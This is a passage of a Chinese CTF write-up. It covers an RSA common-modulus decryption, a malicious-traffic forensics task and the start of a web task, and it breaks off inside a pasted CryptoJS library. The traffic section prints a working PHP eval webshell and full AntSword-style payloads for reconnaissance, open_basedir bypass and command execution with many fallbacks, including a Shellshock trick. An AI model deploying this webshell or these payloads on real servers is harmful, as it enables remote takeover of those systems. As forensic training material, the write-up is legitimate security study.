c1 =282705666501444854624030335843070278110513999208659624119132353417421877320974174726185723115883739375603575539776684289142842081107540752217713310938886388438765148683666503760319981604000841079147612861242547174901151960326185178594145796272575965121308396667074309893237298402981092205251435016486788355557005100976024481986488241332897816063646036029173817781914329777829
c2 =19779823413362200485724149034181018999410626485138088903284373558580616789569485657574219218963582906498915197615166461344813005314601583353879854456996384771611224182224314328699916590207979217040630122659016196173896894143014133285344419385684770427047708769088078011203493463005336960259880317647033975742421041071189257432803790499356057590994991391605641521779836861778658020794054290457012449182530332757413136817938054644562477837440962036207078499430458903340248503943892760759128605500003626883373592832713373873793856007995860587980373325336088814954403731749322597283094105727377495665913500828541311250125
n = 24866250804505220218021129477484568516463472283723642072878571290335870619105804830823116205886290964965394872910452503069396984759129562070393515671275407311508237739944634226857150890458268632605358633616031418076608519871923398298948052896198945015398352362000371666214905121198052253192761994934148606149933191728295444634540686915579254197309033452299738379299252926144007809221771616214106556442176944539578493279760907351585075298726128493600470601333121139581042597139052755429088012111156725917525172320925107023532695431754652983139199688263292810675849198042528240794130276172752316953055879930331587217697
e1 = 3
e2 = 17
g,r,s = gmpy2.gcdext(e1, e2)
m = pow(c1, r , n) * pow(c2, s, n) % n
m = iroot(m,g)[0]
print(long_to_bytes(m))

MISC

恶意流量分析

先分析第一个shell:

<?php
header("HTTP/1.1 404 Not Found");
foreach($_POST as $k => $v){$_POST[$k]=@pack("H*", $v);}
ob_start();
@eval($_POST['ant']);
$output = ob_get_clean();
echo base64_encode($output);
?>

传参ant

image

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.6490fca760";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return @base64_encode($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "486"."62e2";echo @asenc($output);echo "8810"."3adb5";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}   ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="   {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

和蚁剑差不多,返回包删掉前后添加的多余字符解密一下

image

image

下一个流有新的shell

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.b5458";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return @base64_encode($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "1518c"."d5b0d";echo @asenc($output);echo "1c61"."78f7";}ob_start();try{$p=base64_decode(substr($_POST["protocol"],10));$s=base64_decode(substr($_POST["source"],10));$envstr=@base64_decode(substr($_POST["declaring"],10));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";if(substr($d,0,1)=="/"){@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");}else{@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty($envstr)){$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);} else {mail("a@127.0.0.1", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c){$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join("
",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

也有了新的参数procotl source​等,然后追一下逐个解密,发现把flag通过这些参数写到了flag.txt中,找到有flag.txt所在的流量包,剔除前面多余字符解密即可

image

image

image

image

flag{D4572AA3A3D97DDEABD52DF47DA3AD0F}

WEB

应用逻辑异常

!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t,e){return new u.HMAC.init(r,e).finalize(t)}}}),t.algo={});return t}(Math);function K(t,e,r){return t&e|~t&r}function X(t,e,r){return t&r|e&~r}function L(t,e){return t<<e|t>>>32-e}function j(t,e,r,i){var n,o=this._iv;o?(n=o.slice(0),this._iv=void 0):n=this._prevBlock,i.encryptBlock(n,0);for(var s=0;s<r;s++)t[e+s]^=n[s]}function T(t){var e,r,i;return 255==(t>>24&255)?(r=t>>8&255,i=255&t,255===(e=t>>16&255)?(e=0,255===r?(r=0,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i):t+=1<<24,t}function N(){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+886263092+(e[4]>>>0<E[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<E[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<E[6]>>>0?1:0)|0,this._b=e[7]>>>0<E[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;R[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=R[0]+(R[7]<<16|R[7]>>>16)+(R[6]<<16|R[6]>>>16)|0,t[1]=R[1]+(R[0]<<8|R[0]>>>24)+R[7]|0,t[2]=R[2]+(R[1]<<16|R[1]>>>16)+(R[0]<<16|R[0]>>>16)|0,t[3]=R[3]+(R[2]<<8|R[2]>>>24)+R[1]|0,t[4]=R[4]+(R[3]<<16|R[3]>>>16)+(R[2]<<16|R[2]>>>16)|0,t[5]=R[5]+(R[4]<<8|R[4]>>>24)+R[3]|0,t[6]=R[6]+(R[5]<<16|R[5]>>>16)+(R[4]<<16|R[4]>>>16)|0,t[7]=R[7]+(R[6]<<8|R[6]>>>24)+R[5]|0}function q(){for(var t=this._X,e=this._C,r=0;r<8;r++)O[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<O[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<O[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<O[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<O[3]>>>0?1:0)|0,e[5]=e[5]+886263092+(e[4]>>>0<O[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<O[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<O[6]>>>0?1:0)|0,this._b=e[7]>>>0<O[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(I[2]<<8|I[2]>>>24)+I[1]|0,t[4]=I[4]+(I[3]<<16|I[3]>>>16)+(I[2]<<16|I[2]>>>16)|0,t[5]=I[5]+(I[4]<<8|I[4]>>>24)+I[3]|0,t[6]=I[6]+(I[5]<<16|I[5]>>>16)+(I[4]<<16|I[4]>>>16)|0,t[7]=I[7]+(I[6]<<8|I[6]>>>24)+I[5]|0}return F=(M=U).lib,n=F.Base,o=F.WordArray,(M=M.x64={}).Word=n.extend({init:function(t,e){this.high=t,this.low=e}}),M.WordArray=n.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:8*t.length},toX32:function(){for(var t=this.words,e=t.length,r=[],i=0;i<e;i++){var n=t[i];r.push(n.high),r.push(n.low)}return o.create(r,this.sigBytes)},clone:function(){for(var t=n.clone.call(this),e=t.words=this.words.slice(0),r=e.length,i=0;i<r;i++)e[i]=e[i].clone();return t}}),"function"==typeof ArrayBuffer&&(P=U.lib.WordArray,s=P.init,(P.init=function(t){if((t=(t=t instanceof ArrayBuffer?new Uint8Array(t):t)instanceof Int8Array||"undefined"!=typeof Uint8ClampedArray&&t instanceof Uint8ClampedArray||t instanceof Int16Array||t instanceof Uint16Array||t instanceof Int32Array||t instanceof Uint32Array||t instanceof Float32Array||t instanceof Float64Array?new Uint8Array(t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n+=2){var o=e[n>>>2]>>>16-n%4*8&65535;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>1]|=t.charCodeAt(i)<<16-i%2*16;return n.create(r,2*e)}};function s(t){return t<<8&4278255360|t>>>8&16711935}t.Utf16LE={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n+=2){var o=s(e[n>>>2]>>>16-n%4*8&65535);i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>1]|=s(t.charCodeAt(i)<<16-i%2*16);return n.create(r,2*e)}}}(),a=(w=U).lib.WordArray,w.enc.Base64={stringify:function(t){var e=t.words,r=t.sigBytes,i=this._map;t.clamp();for(var n=[],o=0;o<r;o+=3)for(var s=(e[o>>>2]>>>24-o%4*8&255)<<16|(e[o+1>>>2]>>>24-(o+1)%4*8&255)<<8|e[o+2>>>2]>>>24-(o+2)%4*8&255,c=0;c<4&&o+.75*c<r;c++)n.push(i.charAt(s>>>6*(3-c)&63));var a=i.charAt(64);if(a)for(;n.length%4;)n.push(a);return n.join("")},parse:function(t){var e=t.length,r=this._map;if(!(i=this._reverseMap))for(var i=this._reverseMap=[],n=0;n<r.length;n++)i[r.charCodeAt(n)]=n;var o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},h=(F=U).lib.WordArray,F.enc.Base64url={stringify:function(t,e=!0){var r=t.words,i=t.sigBytes,n=e?this._safe_map:this._map;t.clamp();for(var o=[],s=0;s<i;s+=3)for(var c=(r[s>>>2]>>>24-s%4*8&255)<<16|(r[s+1>>>2]>>>24-(s+1)%4*8&255)<<8|r[s+2>>>2]>>>24-(s+2)%4*8&255,a=0;a<4&&s+.75*a<i;a++)o.push(n.charAt(c>>>6*(3-a)&63));var h=n.charAt(64);if(h)for(;o.length%4;)o.push(h);return o.join("")},parse:function(t,e=!0){var r=t.length,i=e?this._safe_map:this._map;if(!(n=this._reverseMap))for(var n=this._reverseMap=[],o=0;o<i.length;o++)n[i.charCodeAt(o)]=o;e=i.charAt(64);return!e||-1!==(e=t.indexOf(e))&&(r=e),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return h.create(i,n)}(t,r,n)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",_safe_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"},function(a){var t=U,e=t.lib,r=e.WordArray,i=e.Hasher,e=t.algo,A=[];!function(){for(var t=0;t<64;t++)A[t]=4294967296*a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],c=t[e+1],a=t[e+2],h=t[e+3],l=t[e+4],f=t[e+5],d=t[e+6],u=t[e+7],p=t[e+8],_=t[e+9],y=t[e+10],v=t[e+11],g=t[e+12],B=t[e+13],w=t[e+14],k=t[e+15],m=H(m=o[0],b=o[1],x=o[2],S=o[3],s,7,A[0]),S=H(S,m,b,x,c,12,A[1]),x=H(x,S,m,b,a,17,A[2]),b=H(b,x,S,m,h,22,A[3]);m=H(m,b,x,S,l,7,A[4]),S=H(S,m,b,x,f,12,A[5]),x=H(x,S,m,b,d,17,A[6]),b=H(b,x,S,m,u,22,A[7]),m=H(m,b,x,S,p,7,A[8]),S=H(S,m,b,x,_,12,A[9]),x=H(x,S,m,b,y,17,A[10]),b=H(b,x,S,m,v,22,A[11]),m=H(m,b,x,S,g,7,A[12]),S=H(S,m,b,x,B,12,A[13]),x=H(x,S,m,b,w,17,A[14]),m=z(m,b=H(b,x,S,m,k,22,A[15]),x,S,c,5,A[16]),S=z(S,m,b,x,d,9,A[17]),x=z(x,S,m,b,v,14,A[18]),b=z(b,x,S,m,s,20,A[19]),m=z(m,b,x,S,f,5,A[20]),S=z(S,m,b,x,y,9,A[21]),x=z(x,S,m,b,k,14,A[22]),b=z(b,x,S,m,l,20,A[23]),m=z(m,b,x,S,_,5,A[24]),S=z(S,m,b,x,w,9,A[25]),x=z(x,S,m,b,h,14,A[26]),b=z(b,x,S,m,p,20,A[27]),m=z(m,b,x,S,B,5,A[28]),S=z(S,m,b,x,a,9,A[29]),x=z(x,S,m,b,u,14,A[30]),m=C(m,b=z(b,x,S,m,g,20,A[31]),x,S,f,4,A[32]),S=C(S,m,b,x,p,11,A[33]),x=C(x,S,m,b,v,16,A[34]),b=C(b,x,S,m,w,23,A[35]),m=C(m,b,x,S,c,4,A[36]),S=C(S,m,b,x,l,11,A[37]),x=C(x,S,m,b,u,16,A[38]),b=C(b,x,S,m,y,23,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[51]),m=D(m,b,x,S,g,6,A[52]),S=D(S,m,b,x,h,10,A[53]),x=D(x,S,m,b,y,15,A[54]),b=D(b,x,S,m,c,21,A[55]),m=D(m,b,x,S,p,6,A[56]),S=D(S,m,b,x,k,10,A[57]),x=D(x,S,m,b,d,15,A[58]),b=D(b,x,S,m,B,21,A[59]),m=D(m,b,x,S,l,6,A[60]),S=D(S,m,b,x,v,10,A[61]),x=D(x,S,m,b,a,15,A[62]),b=D(b,x,S,m,_,21,A[63]),o[0]=o[0]+m|0,o[1]=o[1]+b|0,o[2]=o[2]+x|0,o[3]=o[3]+S|0},_doFinalize:function(){var t=this._data,e=t.words,r=8*this._nDataBytes,i=8*t.sigBytes;e[i>>>5]|=128<<24-i%32;var n=a.floor(r/4294967296),r=r;e[15+(64+i>>>9<<4)]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8),e[14+(64+i>>>9<<4)]=16711935&(r<<8|r>>>24)|4278255360&(r<<24|r>>>8),t.sigBytes=4*(e.length+1),this._process();for(var e=this._hash,o=e.words,s=0;s<4;s++){var c=o[s];o[s]=16711935&(c<<8|c>>>24)|4278255360&(c<<24|c>>>8)}return e},clone:function(){var t=i.clone.call(this);return t._hash=this._hash.clone(),t}});function H(t,e,r,i,n,o,s){s=t+(e&r|~e&i)+n+s;return(s<<o|s>>>32-o)+e}function z(t,e,r,i,n,o,s){s=t+(e&i|r&~i)+n+s;return(s<<o|s>>>32-o)+e}function C(t,e,r,i,n,o,s){s=t+(e^r^i)+n+s;return(s<<o|s>>>32-o)+e}function D(t,e,r,i,n,o,s){s=t+(r^(e|~i))+n+s;return(s<<o|s>>>32-o)+e}t.MD5=i._createHelper(e),t.HmacMD5=i._createHmacHelper(e)}(Math),P=(M=U).lib,t=P.WordArray,e=P.Hasher,P=M.algo,l=[],P=P.SHA1=e.extend({_doReset:function(){this._hash=new t.init([1732584193,4023233417,2562383102,271733878,3285377520])},_doProcessBlock:function(t,e){for(var r=this._hash.words,i=r[0],n=r[1],o=r[2],s=r[3],c=r[4],a=0;a<80;a++){a<16?l[a]=0|t[e+a]:(h=l[a-3]^l[a-8]^l[a-14]^l[a-16],l[a]=h<<1|h>>>31);var h=(i<<5|i>>>27)+c+l[a];h+=a<20?1518500249+(n&o|~n&s):a<40?1859775393+(n^o^s):a<60?(n&o|n&s|o&s)-1894007588:(n^o^s)-899497514,c=s,s=o,o=n<<30|n>>>2,n=i,i=h}r[0]=r[0]+i|0,r[1]=r[1]+n|0,r[2]=r[2]+o|0,r[3]=r[3]+s|0,r[4]=r[4]+c|0},_doFinalize:function(){var t=this._data,e=t.words,r=8*this._nDataBytes,i=8*t.sigBytes;return e[i>>>5]|=128<<24-i%32,e[14+(64+i>>>9<<4)]=Math.floor(r/4294967296),e[15+(64+i>>>9<<4)]=r,t.sigBytes=4*e.length,this._process(),this._hash},clone:function(){var t=e.clone.call(this);return t._hash=this._hash.clone(),t}}),M.SHA1=e._createHelper(P),M.HmacSHA1=e._createHmacHelper(P),function(n){var t=U,e=t.lib,r=e.WordArray,i=e.Hasher,e=t.algo,o=[],p=[];!function(){function t(t){return 4294967296*(t-(0|t))|0}for(var e=2,r=0;r<64;)!function(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}(e)||(r<8&&(o[r]=t(n.pow(e,.5))),p[r]=t(n.pow(e,1/3)),r++),e++}();var _=[],e=e.SHA256=i.extend({_doReset:function(){this._hash=new r.init(o.slice(0))},_doProcessBlock:function(t,e){for(var r=this._hash.words,i=r[0],n=r[1],o=r[2],s=r[3],c=r[4],a=r[5],h=r[6],l=r[7],f=0;f<64;f++){f<16?_[f]=0|t[e+f]:(d=_[f-15],u=_[f-2],_[f]=((d<<25|d>>>7)^(d<<14|d>>>18)^d>>>3)+_[f-7]+((u<<15|u>>>17)^(u<<13|u>>>19)^u>>>10)+_[f-16]);var d=i&n^i&o^n&o,u=l+((c<<26|c>>>6)^(c<<21|c>>>11)^(c<<7|c>>>25))+(c&a^~c&h)+p[f]+_[f],l=h,h=a,a=c,c=s+u|0,s=o,o=n,n=i,i=u+(((i<<30|i>>>2)^(i<<19|i>>>13)^(i<<10|i>>>22))+d)|0}r[0]=r[0]+i|0,r[1]=r[1]+n|0,r[2]=r[2]+o|0,r[3]=r[3]+s|0,r[4]=r[4]+c|0,r[5]=r[5]+a|0,r[6]=r[6]+h|0,r[7]=r[7]+l|0},_doFinalize:function(){var t=this._data,e=t.words,r=8*this._nDataBytes,i=8*t.sigBytes;return e[i>>>5]|=128<<24-i%32,e[14+(64+i>>>9<<4)]=n.floor(r/4294967296),e[15+(64+i>>>9<<4)]=r,t.sigBytes=4*e.length,this._process(),this._hash},clone:function(){var t=i.clone.call(this);return t._hash=this._hash.clone(),t}});t.SHA256=i._createHelper(e),t.HmacSHA256=i._createHmacHelper(e)}(Math),r=(w=U).lib.WordArray,F=w.algo,i=F.SHA256,F=F.SHA224=i.extend({_doReset:function(){this._hash=new r.init([3238371032,914150663,812702999,4144912697,4290775857,1750603025,1694076839,3204075428])},_doFinalize:function(){var t=i._doFinalize.call(this);return t.sigBytes-=4,t}}),w.SHA224=i._createHelper(F),w.HmacSHA224=i._createHmacHelper(F),function(){var t=U,e=t.lib.Hasher,r=t.x64,i=r.Word,n=r.WordArray,r=t.algo;function o(){return i.create.apply(i,arguments)}var t1=[o(1116352408,3609767458),o(1899447441,602891725),o(3049323471,3964484399),o(3921009573,2173295548),o(961987163,4081628472),o(1508970993,3053834265),o(2453635748,2937671579),o(2870763221,3664609560),o(3624381080,2734883394),o(310598401,1164996542),o(607225278,1323610764),o(1426881987,3590304994),o(1925078388,4068182383),o(2162078206,991336113),o(2614888103,633803317),o(3248222580,3479774868),o(3835390401,2666613458),o(4022224774,944711139),o(264347078,2341262773),o(604807628,2007800933),o(770255983,1495990901),o(1249150122,1856431235),o(1555081692,3175218132),o(1996064986,2198950837),o(2554220882,3999719339),o(2821834349,766784016),o(2952996808,2566594879),o(3210313671,3203337956),o(3336571891,1034457026),o(3584528711,2466948901),o(113926993,3758326383),o(338241895,168717936),o(666307205,1188179964),o(773529912,1546045734),o(1294757372,1522805485),o(1396182291,2643833823),o(1695183700,2343527390),o(1986661051,1014477480),o(2177026350,1206759142),o(2456956037,344077627),o(2730485921,1290863460),o(2820302411,3158454273),o(3259730800,3505952657),o(3345764771,106217008),o(3516065817,3606008344),o(3600352804,1432725776),o(4094571909,1467031594),o(275423344,851169720),o(430227734,3100823752),o(506948616,1363258195),o(659060556,3750685593),o(883997877,3785050280),o(958139571,3318307427),o(1322822218,3812723403),o(1537002063,2003034995),o(1747873779,3602036899),o(1955562222,1575990012),o(2024104815,1125592928),o(2227730452,2716904306),o(2361852424,442776044),o(2428436474,593698344),o(2756734187,3733110249),o(3204031479,2999351573),o(3329325298,3815920427),o(3391569614,3928383900),o(3515267271,566280711),o(3940187606,3454069534),o(4118630271,4000239992),o(116418474,1914138554),o(174292421,2731055270),o(289380356,3203993006),o(460393269,320620315),o(685471733,587496836),o(852142971,1086792851),o(1017036298,365543100),o(1126000580,2618297676),o(1288033470,3409855158),o(1501505948,4234509866),o(1607167915,987167468),o(1816402316,1246189591)],e1=[];!function(){for(var t=0;t<80;t++)e1[t]=o()}();r=r.SHA512=e.extend({_doReset:function(){this._hash=new n.init([new i.init(1779033703,4089235720),new i.init(3144134277,2227873595),new i.init(1013904242,4271175723),new i.init(2773480762,1595750129),new i.init(1359893119,2917565137),new i.init(2600822924,725511199),new i.init(528734635,4215389547),new i.init(1541459225,327033209)])},_doProcessBlock:function(t,e){for(var 